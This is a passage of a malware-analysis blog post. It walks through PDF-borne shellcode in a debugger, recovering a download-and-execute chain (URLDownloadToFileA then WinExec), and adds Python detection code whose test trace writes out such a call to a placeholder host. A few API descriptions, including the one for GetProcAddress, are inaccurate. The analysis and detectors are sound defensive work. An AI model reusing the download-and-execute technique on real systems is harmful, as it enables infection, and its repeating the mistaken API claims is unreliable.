is used. To set a software breakpoint the key “F2” is used. To run the program
or execute until a breakpoint is reached, the key “F9” is used. These are the commands
used for this analysis. For an explanation on how to use Immunity Debugger refer
to Dr. Fu’s Security Blog [8].</span></div>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The
first interesting instruction is at the address 00401002. Here the instruction “MOV
EAX, DWORD PTR FS:[EAX+30]” copies an address into the EAX register. Any access through the FS
segment should raise a red flag, because this segment holds critical
per-thread information. The meaning of this location can be verified with WinDbg:
attach WinDbg to any process or executable and examine the data structure for
the Thread Information Block.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF8c0HoFOYy-8t1-ePhymxnFiHzQekTXNeTyJyF1TNlGfbAdjjq8p07fyVV3q5IqAROzWMxYLWkMFDlxzWCiKmBTS2s7GyDJDYGTdwkiB7ogilDvxuhFlpU0x9SnhhMbziPgK2WdoBQSDm/s1600/Figure1-16.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF8c0HoFOYy-8t1-ePhymxnFiHzQekTXNeTyJyF1TNlGfbAdjjq8p07fyVV3q5IqAROzWMxYLWkMFDlxzWCiKmBTS2s7GyDJDYGTdwkiB7ogilDvxuhFlpU0x9SnhhMbziPgK2WdoBQSDm/s400/Figure1-16.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.15 - <i>Data structure for Thread Environment Block in WinDBG</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">As
we can see in Figure 1.15, FS:[30] refers to the ProcessEnvironmentBlock
field, a 32-bit pointer. The next values loaded into the EAX
register are at the address 00401008: DS:[EAX+C] is read first, followed by
DS:[EAX+1C]. DS:[EAX+C] loads the address of “Ldr”, which is a pointer
to _PEB_LDR_DATA. This can be verified with WinDbg.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit4rgnjjxrG6bDgqBwcz26EPll8OK8ClqWI_axps8uejpLG05XOqpbF-sgIhXc5M_y0ehltQARopRbEPv67XayUz08DeEnLfczRxY9h7wGKsXLQfZllrItstzpTmwv1peu8m0ij85uwutd/s1600/Figure1-17.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit4rgnjjxrG6bDgqBwcz26EPll8OK8ClqWI_axps8uejpLG05XOqpbF-sgIhXc5M_y0ehltQARopRbEPv67XayUz08DeEnLfczRxY9h7wGKsXLQfZllrItstzpTmwv1peu8m0ij85uwutd/s400/Figure1-17.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.16 -<i> Data structure of _PEB in WinDBG</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The
second instruction, DS:[EAX+1C], then saves the address of InInitializationOrderModuleList
to the EAX register. This address points to the head of a list of loaded modules,
and the malware will probably try to locate one of these modules later. This
can also be verified with WinDbg.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgK-27u5F7y6-Y7hEM_pI11MnwJTXQcHeKkcJvwXNhyphenhyphenVFi2Ie-aP-IYQIJ_LvSKSgEa7JUmq7mtGalw6ExRXCCJjL575Bi9F_J49ODgbGrnC0EPdixfLrYKwqU9zUIqJA-wcs6_V9bsGNsN/s1600/Figure1-19.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgK-27u5F7y6-Y7hEM_pI11MnwJTXQcHeKkcJvwXNhyphenhyphenVFi2Ie-aP-IYQIJ_LvSKSgEa7JUmq7mtGalw6ExRXCCJjL575Bi9F_J49ODgbGrnC0EPdixfLrYKwqU9zUIqJA-wcs6_V9bsGNsN/s400/Figure1-19.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.17 - <i>Data structure of _PEB_LDR_DATA</i></td></tr>
</tbody></table>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">As
we can see in Figure 1.17, InInitializationOrderModuleList is at offset 1C.
Next let us set a breakpoint at 0040105F. As we can see from Figure 1.18 there
is a nested loop. After some analysis we can conclude that the malware carries its
own hash table and attempts to locate a specific function to load from
kernel32.dll. At the address 0040105B the instruction CMP EDI, EAX compares the
hash values; if they are not equal, the malware continues to search the list of modules.
When the malware finds the module, the JNZ is not taken and execution continues
to the instruction at 0040105F, which pops the top of the stack into the ESI
register.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0rFdD3bI8U6hFBbscYWlGQKyrt6kwcQgjG7oKOssvgEzRI7-3WwsMjnpGJF5Y-vKGo5BHvI4_mX1t82Du_Rh0KcPyYbD8HUYCBukNzQaZ0W61ITSFHGH0axGfAClglT1a1DmlWMvMYod2/s1600/Figure1-20.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="247" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0rFdD3bI8U6hFBbscYWlGQKyrt6kwcQgjG7oKOssvgEzRI7-3WwsMjnpGJF5Y-vKGo5BHvI4_mX1t82Du_Rh0KcPyYbD8HUYCBukNzQaZ0W61ITSFHGH0axGfAClglT1a1DmlWMvMYod2/s400/Figure1-20.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.18 - <i>Section of shellcode loaded in Immunity Debugger</i></td></tr>
</tbody></table>
<div>
<br /></div>
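<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The three loads traced above (FS:[30] for the PEB, +0C for Ldr, +1C for InInitializationOrderModuleList) have fixed byte encodings, which makes the walk a usable triage signature on the decoded shellcode before it ever reaches a debugger. The Python below is an added example, not the article's code or output; the byte patterns are standard IA-32 encodings, while the sample buffers are constructed here and are not the AudioDr7 bytes.</span></div>

```python
# Byte encodings of the PEB-walk instructions the article steps through in
# Immunity Debugger. Standard IA-32: 64 = FS segment override, 8B = MOV r32, r/m32,
# ModRM 40 = [EAX+disp8], A1 = MOV EAX, moffs32, ModRM 0D/15 = [disp32] into ECX/EDX.
PEB_WALK_SIGNATURES = (
    (b"\x64\x8b\x40\x30", "MOV EAX, FS:[EAX+30]   ; TEB -> PEB (EAX must be 0)"),
    (b"\x64\xa1\x30\x00\x00\x00", "MOV EAX, FS:[30]       ; TEB -> PEB"),
    (b"\x64\x8b\x0d\x30\x00\x00\x00", "MOV ECX, FS:[30]       ; TEB -> PEB"),
    (b"\x64\x8b\x15\x30\x00\x00\x00", "MOV EDX, FS:[30]       ; TEB -> PEB"),
    (b"\x8b\x40\x0c", "MOV EAX, [EAX+0C]      ; PEB -> Ldr (_PEB_LDR_DATA)"),
    (b"\x8b\x40\x1c", "MOV EAX, [EAX+1C]      ; Ldr -> InInitializationOrderModuleList"),
)

# Constructed samples (not the AudioDr7 bytes). SAMPLE_CODE is xor eax,eax
# followed by the three loads described at 00401002 and 00401008, then NOPs.
# BENIGN_CODE is an ordinary function prologue that also uses a +0C displacement,
# but relative to EBP, so it must not match.
SAMPLE_CODE = bytes.fromhex("33c0" "648b4030" "8b400c" "8b401c" "90909090")
BENIGN_CODE = bytes.fromhex("558bec" "8b450c" "5dc3")


def find_peb_walk(code):
    """Return sorted (offset, description) pairs for every signature occurrence."""
    hits = []
    for pattern, description in PEB_WALK_SIGNATURES:
        start = code.find(pattern)
        while start >= 0:
            hits.append((start, description))
            start = code.find(pattern, start + 1)
    return sorted(hits)


def looks_like_peb_walk(code, window=32):
    """Heuristic verdict: a TEB->PEB read followed, within `window` bytes, by the
    Ldr read (+0C) and then the module-list read (+1C). Benign code reads the
    PEB too (runtime start-up, anti-debug checks), so treat a hit as a lead for
    the debugger session, not as proof."""
    hits = find_peb_walk(code)
    peb_reads = [off for off, d in hits if "FS:[" in d]
    ldr_reads = [off for off, d in hits if "+0C]" in d]
    list_reads = [off for off, d in hits if "+1C]" in d]
    return any(p < l < m <= p + window
               for p in peb_reads for l in ldr_reads for m in list_reads)


if __name__ == "__main__":
    for off, description in find_peb_walk(SAMPLE_CODE):
        print("%08x  %s" % (off, description))
    print("PEB walk:", looks_like_peb_walk(SAMPLE_CODE))
```

<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">On the constructed buffer the three hits land at offsets 2, 6 and 9, mirroring the sequence the debugger shows at 00401002 and 00401008. The signature list is deliberately short: shellcode that chooses a different register for the walk, or that reaches the module list by +14 (InMemoryOrderModuleList) instead of +1C, will need its own entries, which is why the verdict function is a lead for the analyst and not an automatic classification.</span></div>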
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">After
the breakpoint has been set at 0040105F we can run the program to the
breakpoint with the key “F9”. Continue to step through the program until the
instruction ADD EAX, EBX at address 00401071. Here the EAX register holds the address of the function
the malware was searching for. The function is GetTempPathA,
which corresponds to the output of libemu.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilPr8qLhpaYjswpE9TwFPQUlHRuMH7C0FeNavacO1OhK3OSKOI9rvaXGRWBB4XUBwrqWkeXBXj4IkmZmJVJEebCRTXoOtMgA6dVOWZDjg5M5l7tlmqCZnbWwEt9FYX37u0-Kv11MtIXGZ3/s1600/Figure1-21.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilPr8qLhpaYjswpE9TwFPQUlHRuMH7C0FeNavacO1OhK3OSKOI9rvaXGRWBB4XUBwrqWkeXBXj4IkmZmJVJEebCRTXoOtMgA6dVOWZDjg5M5l7tlmqCZnbWwEt9FYX37u0-Kv11MtIXGZ3/s400/Figure1-21.PNG" width="385" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.19 - <i>Registers of shellcode.exe at address 00401071</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">We
continue to step through the program; inside the function GetTempPathA it
obtains the temp folder of the system and returns the Unicode string to the
malware. Figure 1.20 displays the stack contents at the address 7C822220, which
is inside the function GetTempPathA. The value stored is “C:\DOCUME~1\Mario\LOCALS~1\Temp\”.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihFAxvo6E26MzVEYv3GTUWLQCts83cSMjFwdn0cG_fUiTFKWfhSiGXABnnY9abwwe0I14e04zKCABUWX_zYb61-LznBkoDw0S1_mIQsS2jTR2-MzSKR-IRhu9Ps69H9uQkEajKRO9mlJo4/s1600/Figure1-22.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihFAxvo6E26MzVEYv3GTUWLQCts83cSMjFwdn0cG_fUiTFKWfhSiGXABnnY9abwwe0I14e04zKCABUWX_zYb61-LznBkoDw0S1_mIQsS2jTR2-MzSKR-IRhu9Ps69H9uQkEajKRO9mlJo4/s640/Figure1-22.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.20 - <i>Stack contents of shellcode.exe at address 7C822220</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">We
continue to step through the program, and at address 0040109E, at the instruction
PUSH EAX, we can see that the ESI register points to the temporary path of the
system followed by the file name of an executable, “e.exe”. This is most likely the
file the malware wants to download.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQ8T8BAf8kG8VFT1Hns2SNzAZCT-qN-oUWfJXqENwZjHdu8RgAhd7FpnWYD69h532ZXiXN3w0Elfc9Gw2psQXd3cN4kuPKMimYqXZ9gadvFShNuGfxIDYr4sQ3I6I19UmftHAfCw2_Hirr/s1600/Figure1--.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="246" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQ8T8BAf8kG8VFT1Hns2SNzAZCT-qN-oUWfJXqENwZjHdu8RgAhd7FpnWYD69h532ZXiXN3w0Elfc9Gw2psQXd3cN4kuPKMimYqXZ9gadvFShNuGfxIDYr4sQ3I6I19UmftHAfCw2_Hirr/s640/Figure1--.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.20 - <i>Immunity Debugger instructions and registers at the address 0040109E</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">We
continue to step through the program and note the functions that are called
by the malware; these reveal what the malware is actually trying to accomplish.
A breakpoint is set at the POP EDI instruction to quickly find the different
functions the malware will call. This location is chosen because it follows the
hash table function that searches for an API function and, if the hash matches,
leaves the function name visible on the stack.</span></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHkXyHbTFLka7ELsPsAb0F0xznvT1gbDFzaZ1S90-SLY0YPBRr32KuYhF8aSKlGITD2KuvBu83HxVS44Ct49sp2spZPdbFtjc5xmHsIdXb3JZtjb-ZdhydansP0U3JG3X4lHGlhBFDB9_c/s1600/Figure1-23.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="254" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHkXyHbTFLka7ELsPsAb0F0xznvT1gbDFzaZ1S90-SLY0YPBRr32KuYhF8aSKlGITD2KuvBu83HxVS44Ct49sp2spZPdbFtjc5xmHsIdXb3JZtjb-ZdhydansP0U3JG3X4lHGlhBFDB9_c/s640/Figure1-23.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.21 - <i>Immunity Debugger showing the function in EAX register</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The
second function called by the malware is GetProcAddress and this is from the
dll file kernel32. The function name can be seen in the register EAX in Figure
1.21. We continue to the next function by pressing “F9”.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFdixNBO_pq-iCMb_Abw4M0iQosu1ieEKGKE7Drt8cgG7_L987ZAl60FKINoDRi7uV_85Eabh27QyaCsGl-UW8KQRE8HGHYR-fgFVUd1RZCtPtFR1aXlhLW4c3918nTG3D147w_A7-18KP/s1600/Figure1-24.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="294" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFdixNBO_pq-iCMb_Abw4M0iQosu1ieEKGKE7Drt8cgG7_L987ZAl60FKINoDRi7uV_85Eabh27QyaCsGl-UW8KQRE8HGHYR-fgFVUd1RZCtPtFR1aXlhLW4c3918nTG3D147w_A7-18KP/s640/Figure1-24.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.22 - <i>Immunity Debugger showing the function in the EAX register</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Above
in Figure 1.22 the third function called is stored in the EAX register. The
function is LoadLibraryA, which is also found in the kernel32.dll file. If we
further examine the call to LoadLibraryA we find that two extra libraries
are loaded into memory: first twain_32.dll and second urlmon.dll.</span></div>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Again
we execute the program to the breakpoint at 00401073 and the fourth function
called is URLDownloadToFileA from the library urlmon.dll. The function can be
seen in the EAX register in Figure 1.23.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYKEplseTm1zW2hG2MGGWCtVBDn_qgtxyAWJ2g7BtcU1mpoXkBoQLjNo4vWdkALaPNFMctvTrIFDERSPuWVHdZNANzGLhuYS-nmWaukM8g6iLsba9prmGIaw9s4AORSL0EloagDgpwDrqy/s1600/Figure1-25.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYKEplseTm1zW2hG2MGGWCtVBDn_qgtxyAWJ2g7BtcU1mpoXkBoQLjNo4vWdkALaPNFMctvTrIFDERSPuWVHdZNANzGLhuYS-nmWaukM8g6iLsba9prmGIaw9s4AORSL0EloagDgpwDrqy/s640/Figure1-25.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.23 - <i>Immunity Debugger showing the function in the EAX register</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Examining
the call to URLDownloadToFileA we find the web address it connects to in an attempt to download an executable. The address is “http://audiodr7...” and
it is the same one that appeared in the hexdump of the shellcode in Figure 1.9.
Figure 1.26 shows the stack contents at the address 772BAAD3 inside the
URLDownloadToFileA function.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8OIMPlpYhFCLpM1ujkjzb2aFbpRLbvD0rGWPYyzIRUoGYrD2ZisWeFwuPV70OTTgsCF7Ab4Wzgtwv_2zec05VefqJp3KgWRqLtNmoiAvWz4GXcum7Zr7rAunX-XAXcbXgqHecTU5RGMyV/s1600/Figure1-26.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8OIMPlpYhFCLpM1ujkjzb2aFbpRLbvD0rGWPYyzIRUoGYrD2ZisWeFwuPV70OTTgsCF7Ab4Wzgtwv_2zec05VefqJp3KgWRqLtNmoiAvWz4GXcum7Zr7rAunX-XAXcbXgqHecTU5RGMyV/s640/Figure1-26.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.24 - <i>Stack contents at address 772BAAD3</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Again
we execute the program to the previously set breakpoint by pressing “F9” and we
obtain the fifth function called. The function WinExec from the library
kernel32 is called and the address is stored in the EAX register. After the
WinExec function is called the malware terminates and the system is infected.</span></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgi7k-F7-q3qo8pJcW7c4ONLq-lpEr-mc19_B5RXo1Frsai4N_arPQ2Ey1zskWYCRQ27xmR9ucZad8k45WM_-vsRk9rQ-VYutziD0gocG5ktkgztzQj3qWIl5pxpWPIYxiYW8VgQS1wl7m/s1600/Figure1-27.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="288" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgi7k-F7-q3qo8pJcW7c4ONLq-lpEr-mc19_B5RXo1Frsai4N_arPQ2Ey1zskWYCRQ27xmR9ucZad8k45WM_-vsRk9rQ-VYutziD0gocG5ktkgztzQj3qWIl5pxpWPIYxiYW8VgQS1wl7m/s640/Figure1-27.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.25 - <i>Immunity Debugger showing the function in the EAX register</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-size: large;">5. Conclusion</span></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Now
we have an overview of what the audiodr7 malware is trying to accomplish and
which functions the malware attempts to call. To summarize, five important
functions are called.</span></div>
<div>
<ol>
<li><span style="background-color: white; font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">GetTempPath
– Obtains the location of the temporary folder for the system</span></li>
<li><span style="background-color: white; font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">GetProcAddress
– Obtains the address of the process running</span></li>
<li><span style="background-color: white; font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">LoadLibraryA
– Calls this function to load two extra libraries, twain_32.dll and urlmon.dll</span></li>
<li><span style="background-color: white; font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">URLDownloadToFileA
– Connects to the audiodr7 URL and downloads the file “e.exe” to the temp location</span></li>
<li><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;"><span style="background-color: white;">WinExec
–</span> The last function called in order to execute the downloaded file “e.exe”</span></li>
</ol>
</div>
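<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The five-call chain summarized above is a pattern a defender can look for in an API call trace. The Python below is an added example, not code from the original article or from any of the tools it cites. It parses a constructed, debugger-style trace (the URL and user name in it are placeholders, not the sample’s real indicators) and reports when a file fetched with URLDownloadToFileA into the directory returned by GetTempPathA is later handed to WinExec, recording which libraries were loaded first.</span></div>

```python
"""Added example (not from the original article): flag the download-and-execute
chain recovered from the AudioDr7 shellcode in a Windows API call trace."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample trace in a "Api(name=value, ...) -> result" form similar to
# what a debugger script or API-logging emulator could emit. The URL and the
# user name are placeholders, not the real indicators from the sample.
SAMPLE_TRACE = r"""
GetTempPathA(nBufferLength=260, lpBuffer=0x0012ff00) -> "C:\DOCUME~1\user\LOCALS~1\Temp\"
GetProcAddress(hModule=kernel32.dll, lpProcName="LoadLibraryA")
LoadLibraryA(lpLibFileName="twain_32.dll")
LoadLibraryA(lpLibFileName="urlmon.dll")
URLDownloadToFileA(pCaller=0, szURL="http://example.invalid/e.exe", szFileName="C:\DOCUME~1\user\LOCALS~1\Temp\e.exe", dwReserved=0, lpfnCB=0)
WinExec(lpCmdLine="C:\DOCUME~1\user\LOCALS~1\Temp\e.exe", uCmdShow=0)
"""

CALL_RE = re.compile(r'^\s*(?P<api>\w+)\((?P<args>.*?)\)(?:\s*->\s*(?P<ret>.*))?\s*$')
ARG_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|[^,)]+)')
EXEC_APIS = {'WinExec', 'CreateProcessA', 'CreateProcessW', 'ShellExecuteA', 'ShellExecuteW'}


@dataclass
class Call:
    api: str
    args: Dict[str, str] = field(default_factory=dict)
    ret: Optional[str] = None


def _unquote(value: str) -> str:
    value = value.strip()
    if len(value) >= 2 and value[0] == '"' and value[-1] == '"':
        return value[1:-1]
    return value


def parse_call(line: str) -> Optional[Call]:
    """Parse one trace line; returns None for blank or unrecognised lines."""
    m = CALL_RE.match(line)
    if not m:
        return None
    args = {k: _unquote(v) for k, v in ARG_RE.findall(m.group('args'))}
    ret = _unquote(m.group('ret')) if m.group('ret') else None
    return Call(m.group('api'), args, ret)


def find_download_exec_chain(trace: str) -> List[dict]:
    """Return one finding per executed file that was first written by
    URLDownloadToFile*. Each finding records the source URL, the local path,
    whether that path lies under the directory returned by GetTempPath*, the
    libraries loaded before execution, and the API used to run the file."""
    temp_dir: Optional[str] = None
    loaded: List[str] = []
    downloads: Dict[str, str] = {}   # lower-cased local path -> source URL
    findings: List[dict] = []
    for line in trace.splitlines():
        call = parse_call(line)
        if call is None:
            continue
        if call.api.startswith('GetTempPath') and call.ret:
            temp_dir = call.ret.lower()
        elif call.api.startswith('LoadLibrary'):
            loaded.append(call.args.get('lpLibFileName', '').lower())
        elif call.api.startswith('URLDownloadToFile'):
            downloads[call.args.get('szFileName', '').lower()] = call.args.get('szURL', '')
        elif call.api in EXEC_APIS:
            target = (call.args.get('lpCmdLine') or call.args.get('lpApplicationName')
                      or call.args.get('lpFile') or '').lower()
            for path, url in downloads.items():
                if path and path in target:
                    findings.append({
                        'url': url,
                        'path': path,
                        'in_temp_dir': bool(temp_dir and path.startswith(temp_dir)),
                        'loaded_libraries': list(loaded),
                        'exec_api': call.api,
                    })
    return findings


if __name__ == '__main__':
    for finding in find_download_exec_chain(SAMPLE_TRACE):
        print(finding)
```

<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The check keys on the relationship between the calls (the downloaded path reappearing in the execution call) rather than on any single API, so a benign trace that calls WinExec on its own is not flagged, while a trace that swaps WinExec for CreateProcessA still is.</span></div>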
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">To
conclude, many tools exist to help aid in the analysis of malware. The
approach described above is one way to reverse engineer malware, specifically
malware that is embedded into a PDF document.</span></div>
<div>
<br /></div>
<div>
<span style="font-size: large;">6. References</span></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">[1]
Jsunpack, Available at </span><a href="https://code.google.com/p/jsunpack-n/" style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;" target="_blank">https://code.google.com/p/jsunpack-n/</a></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">[2]
SpiderMonkey, Available at </span><a href="https://developer.mozilla.org/en/SpiderMonkey" style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;" target="_blank">https://developer.mozilla.org/en/SpiderMonkey</a></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">[3]
V8 JavaScript Engine, Available at </span><a href="http://code.google.com/p/v8/" style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;" target="_blank">http://code.google.com/p/v8/</a></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">[4]
Michael Leigh, </span><i style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">“Malware Analyst’s
Cookbook and DVD”</i><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">, Available at</span></div>
<div>
<a href="http://www.amazon.com/Malware-Analysts-Cookbook-DVD-Techniques/dp/0470613033" style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;" target="_blank">http://www.amazon.com/Malware-Analysts-Cookbook-DVD-Techniques/dp/0470613033</a></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">[5]
Libemu – x86 Shellcode Emulation, Available at </span><a href="http://libemu.carnivore.it/" style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;" target="_blank">http://libemu.carnivore.it/</a></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">[6]
Immunity Debugger, Available at </span><a href="http://www.immunitysec.com/products-immdbg.shtml" style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;" target="_blank">http://www.immunitysec.com/products-immdbg.shtml</a></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">[7]
Shellcode 2 Exe, Available at </span><a href="http://sandsprite.com/shellcode_2_exe.php" style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;" target="_blank">http://sandsprite.com/shellcode_2_exe.php</a></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">[8]
Dr. Xiang Fu, Malware Analysis Tutorial 4: Int2dh Anti-Debugging, Available at,</span></div>
<div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;"> <a href="http://fumalwareanalysis.blogspot.com/2011/08/malware-analysis-tutorial-reverse_31.html" target="_blank">http://fumalwareanalysis.blogspot.com/2011/08/malware-analysis-tutorial-reverse_31.html</a></span></div>
<div>
<br /></div>
<div>
